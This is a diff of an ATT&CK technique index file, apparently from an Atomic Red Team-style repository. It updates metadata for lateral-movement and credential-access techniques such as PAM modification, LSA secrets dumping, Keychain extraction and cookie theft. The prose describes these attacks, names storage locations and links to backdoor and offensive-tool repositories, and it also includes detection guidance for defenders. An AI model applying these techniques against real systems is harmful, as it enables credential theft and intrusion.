         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -42343,7 +43019,7 @@ lateral-movement:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -42376,7 +43052,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests: []
   T1210:
@@ -42415,7 +43090,7 @@ lateral-movement:
         description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
           Detail. Retrieved April 3, 2018.
         source_name: NVD CVE-2014-7169
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-24T15:06:46.006Z'
       name: Exploitation of Remote Services
       description: |-
         Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
@@ -42449,12 +43124,10 @@ lateral-movement:
         and goal, the system and exploitable service may need to be remotely accessible
         from the internal network.
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1534:
     technique:
-      modified: '2024-02-16T13:09:39.215Z'
+      modified: '2024-10-15T15:59:36.741Z'
       name: Internal Spearphishing
       description: |-
         After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
@@ -42482,10 +43155,9 @@ lateral-movement:
       - Windows
       - macOS
       - Linux
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -42515,7 +43187,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1570:
     technique:
@@ -42577,12 +43248,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1570
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -42606,11 +43276,10 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -42635,9 +43304,8 @@ lateral-movement:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.002:
     technique:
@@ -42697,7 +43365,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1563.002
     atomic_tests: []
   T1550.002:
@@ -42752,7 +43419,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests: []
   T1021.001:
@@ -42820,12 +43486,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.001
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -42882,6 +43547,7 @@ lateral-movement:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -42892,13 +43558,12 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -42957,7 +43622,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 credential-access:
   T1557:
@@ -43051,49 +43715,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -43108,20 +43733,57 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1056.001:
@@ -43201,12 +43863,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests: []
   T1110.001:
     technique:
-      modified: '2023-10-16T16:57:41.743Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Guessing'
       description: |-
         Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -43235,6 +43896,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Mohamed Kmal
@@ -43246,18 +43908,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -43284,14 +43946,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.001
     atomic_tests: []
   T1003:
     technique:
-      modified: '2024-04-18T23:47:41.667Z'
+      modified: '2024-10-15T15:12:43.034Z'
       name: OS Credential Dumping
       description: |
         Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -43415,12 +44074,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003
     atomic_tests: []
   T1539:
     technique:
-      modified: '2024-04-16T12:56:56.861Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Web Session Cookie
       description: |-
         An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -43435,10 +44093,11 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Johann Rehberger
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for attempts to access files and repositories on
         a local system that are used to store browser session cookies. Monitor for
@@ -43446,14 +44105,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'File: File Access'
@@ -43496,14 +44155,11 @@ credential-access:
         url: https://blog.talosintelligence.com/roblox-scam-overview/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1539
     atomic_tests: []
   T1003.002:
     technique:
-      modified: '2023-07-24T18:53:10.860Z'
+      modified: '2024-10-15T16:40:52.174Z'
       name: 'OS Credential Dumping: Security Account Manager'
       description: "Adversaries may attempt to extract credential material from the
         Security Account Manager (SAM) database either through in-memory techniques
@@ -43558,14 +44214,13 @@ credential-access:
         url: https://github.com/Neohapsis/creddump7
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.002
     atomic_tests: []
   T1552.005:
     technique:
-      modified: '2023-03-21T13:56:27.910Z'
+      modified: '2024-10-15T16:24:20.219Z'
       name: 'Unsecured Credentials: Cloud Instance Metadata API'
       description: |
         Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -43616,14 +44271,13 @@ credential-access:
         url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.005
     atomic_tests: []
   T1555.002:
     technique:
-      modified: '2024-03-29T16:37:34.772Z'
+      modified: '2024-10-15T16:41:18.638Z'
       name: Securityd Memory
       description: |-
         An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -43657,8 +44311,8 @@ credential-access:
         external_id: T1555.002
       - source_name: External to DA, the OS X Way
         description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
       - source_name: Apple Dev SecurityD
         description: Apple. (n.d.). Security Server and Security Agent. Retrieved
           March 29, 2024.
@@ -43675,11 +44329,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.002:
     technique:
-      modified: '2023-03-30T21:01:48.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Cracking'
       description: "Adversaries may use password cracking to attempt to recover usable
         credentials, such as plaintext passwords, when credential material such as
@@ -43697,7 +44350,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Mohamed Kmal
       x_mitre_deprecated: false
@@ -43714,10 +44367,10 @@ credential-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Azure AD
       - Network
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -43741,46 +44394,12 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Password_cracking
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1110.002
     atomic_tests: []
   T1555.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
-      created: '2020-02-12T18:55:24.728Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.001
-        url: https://attack.mitre.org/techniques/T1555/001
-      - source_name: External to DA, the OS X Way
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-      - source_name: Keychain Services Apple
-        url: https://developer.apple.com/documentation/security/keychain_services
-        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
-      - source_name: Empire Keychain Decrypt
-        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
-        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
-          Retrieved April 14, 2022.
-      - source_name: OSX Keychain Schaumann
-        url: https://www.netmeister.org/blog/keychain-passwords.html
-        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
-          store and retrieve passwords. Retrieved March 31, 2022.
-      - source_name: Keychain Decryption Passware
-        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
-        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
-          Retrieved April 13, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:35:39.985Z'
+      name: 'Credentials from Password Stores: Keychain'
       description: "Adversaries may acquire credentials from Keychain. Keychain (or
         Keychain Services) is the macOS credential management system that stores account
         names, passwords, private keys, certificates, sensitive application data,
@@ -43801,65 +44420,62 @@ credential-access:
         file. Both methods require a password, where the default password for the
         Login Keychain is the current user’s password to login to the macOS host.(Citation:
         External to DA, the OS X Way)(Citation: Empire Keychain Decrypt)  "
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Credentials from Password Stores: Keychain'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Unlocking the keychain and using passwords from it is a very
         common process, so there is likely to be a lot of noise in any detection technique.
         Monitoring of system calls to the keychain can help determine if there is
         a suspicious process trying to access it.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Process: OS API Execution'
       - 'File: File Access'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+      created: '2020-02-12T18:55:24.728Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/001
+        external_id: T1555.001
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      - source_name: Keychain Services Apple
+        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+        url: https://developer.apple.com/documentation/security/keychain_services
+      - source_name: Empire Keychain Decrypt
+        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+          Retrieved April 14, 2022.
+        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+      - source_name: OSX Keychain Schaumann
+        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+          store and retrieve passwords. Retrieved March 31, 2022.
+        url: https://www.netmeister.org/blog/keychain-passwords.html
+      - source_name: Keychain Decryption Passware
+        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+          Retrieved April 13, 2022.
+        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.001
     atomic_tests: []
   T1003.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ed Williams, Trustwave, SpiderLabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
-      type: attack-pattern
-      created: '2020-02-21T16:22:09.493Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.004
-        url: https://attack.mitre.org/techniques/T1003/004
-      - source_name: Passcape LSA Secrets
-        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
-        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
-          2020.
-      - source_name: Microsoft AD Admin Tier Model
-        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
-        description: Microsoft. (2019, February 14). Active Directory administrative
-          tier model. Retrieved February 21, 2020.
-      - source_name: Tilbury Windows Credentials
-        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
-        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
-          Mitigation, Defense. Retrieved February 21, 2020.'
-      - source_name: ired Dumping LSA Secrets
-        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
-        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
-          Retrieved February 21, 2020.
-      - url: https://github.com/mattifestation/PowerSploit
-        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
-        source_name: Powersploit
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-13T15:49:17.591Z'
       name: 'OS Credential Dumping: LSA Secrets'
       description: |-
         Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
@@ -43868,6 +44484,9 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ed Williams, Trustwave, SpiderLabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor processes and command-line arguments for program
         execution that may be indicative of credential dumping. Remote access tools
         may contain built-in features or incorporate existing tools like Mimikatz.
@@ -43875,31 +44494,63 @@ credential-access:
         such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
         may require additional logging features to be configured in the operating
         system to collect necessary information for analysis.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+      created: '2020-02-21T16:22:09.493Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/004
+        external_id: T1003.004
+      - source_name: Tilbury Windows Credentials
+        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+          Mitigation, Defense. Retrieved February 21, 2020.'
